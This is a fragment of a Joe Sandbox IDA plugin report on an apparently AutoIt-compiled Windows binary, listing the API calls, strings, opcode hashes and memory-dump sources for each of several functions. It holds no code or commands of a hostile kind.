                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                    • Opcode ID: c4cdd221d5ba49721e3db685842f66387ac4e74c45482740423e4a88794883a1
                                                                                                                                                                                                                                                                                    • Instruction ID: 5ec5b74cedca77f2291c9839dc2f6310028bce7e361da43574540e3aa31411ca
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4cdd221d5ba49721e3db685842f66387ac4e74c45482740423e4a88794883a1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7401A275A441056ACB05F7A4C946EFF77F8DF15340F940066B802A3281DB718F18B6B2
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B44620
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00B42720
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                    • Opcode ID: 60871ff55d09a14eb4af0fd36daf86db490f7d2f31aab2d9a466c3e65ee5f643
                                                                                                                                                                                                                                                                                    • Instruction ID: 4f6d666b4b5adb64835e514fe8ec75224c2575c49af76c607d424e608e16c0dc
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60871ff55d09a14eb4af0fd36daf86db490f7d2f31aab2d9a466c3e65ee5f643
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69F0F475A402146ACB05A7A48C86FFF73F8EF01340F840955F822A32C1DB605E08A270
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00B4146F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Message
                                                                                                                                                                                                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                                    • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                                    • Opcode ID: cb82f107fa11fc8e425db5c4f5790ca4a9e0cb1075a303bc197363ad3e0c9aaa
                                                                                                                                                                                                                                                                                    • Instruction ID: 7d63c72f7af21b690e589527d984f8be3a4a9c23a4682e11e09e708268f9e1db
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb82f107fa11fc8e425db5c4f5790ca4a9e0cb1075a303bc197363ad3e0c9aaa
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ECE0D83224831536D2203794BC03F857AD48F05B91F11489AF75C794C24EF225905699
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AFFAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00B010E2,?,?,?,00AE100A), ref: 00AFFAD9
                                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00AE100A), ref: 00B010E6
                                                                                                                                                                                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00AE100A), ref: 00B010F5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B010F0
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                                    • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                                    • Opcode ID: f7d669fcecc3e254ffd409552f9ce9eb997e6d6c13a6485da810396a33ac8ec0
                                                                                                                                                                                                                                                                                    • Instruction ID: c69bf4e70c96c48c5440062f564c9e06718e0bbb60232565d1423d8d57d85112
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f7d669fcecc3e254ffd409552f9ce9eb997e6d6c13a6485da810396a33ac8ec0
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BCE039706003518BD364AF68E905602BAE4EF04381F008D9CE886D36A1EBB4D488CB91
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00B539F0
                                                                                                                                                                                                                                                                                    • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00B53A05
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                                    • String ID: aut
                                                                                                                                                                                                                                                                                    • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                                    • Opcode ID: 5d1c8426f30c177e1b0a2337e68a1a6a61d7d32b362e0899e7a9b60a2e611023
                                                                                                                                                                                                                                                                                    • Instruction ID: 7502e792131579eda376d553e983e15baaa23b3856f55fbc0c80f8cb0d7f4ae0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d1c8426f30c177e1b0a2337e68a1a6a61d7d32b362e0899e7a9b60a2e611023
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAD05E7254432877DA20A764DC0EFCB7A7CDF45750F0002A1BA59920A2DEB0DA86CB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B72DC8
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B72DDB
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4F292: Sleep.KERNEL32 ref: 00B4F30A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                    • Opcode ID: bcfb86273fbffcb12f43edd83e17505abadfaf8bda77b2d70f947a6d37abe8d1
                                                                                                                                                                                                                                                                                    • Instruction ID: dee90ba449777fb17045b1ea5f06dcb953915b2788a0c97ba71322c228572f6a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcfb86273fbffcb12f43edd83e17505abadfaf8bda77b2d70f947a6d37abe8d1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9AD0C935399315ABE664A770AC0BFE66AA4AF50B50F104869B249AB1D0CDE0A8408654
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B72E08
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000), ref: 00B72E0F
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4F292: Sleep.KERNEL32 ref: 00B4F30A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                    • Opcode ID: da1761c51736065ef284f0f77315ee91cfbd13ce598f12d673dc97383aa1dcd6
                                                                                                                                                                                                                                                                                    • Instruction ID: b711c9188a2a6272f1315180d1b1a14509ce033e7b4d94dca55c331e4cdc4156
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da1761c51736065ef284f0f77315ee91cfbd13ce598f12d673dc97383aa1dcd6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3D0C9353C93156BE664A770AC0BFD66AA4AF55B50F504869B249AB1D0CDE0A8408654
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00B1C213
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00B1C221
                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B1C27C
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                                    • Opcode ID: bdd818f3589c54d365ce33112e11e594daa7d868667a8a67391b049d6daee054
                                                                                                                                                                                                                                                                                    • Instruction ID: b03e9a2323dcf4f0880de334439f48ac12ba55c2482704aa4bfcfcfe122537c5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bdd818f3589c54d365ce33112e11e594daa7d868667a8a67391b049d6daee054
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D41D530680216AFDB218FE5C844AFA7FE5EF11720F6441E9E859AB1A1DB309D81C7A1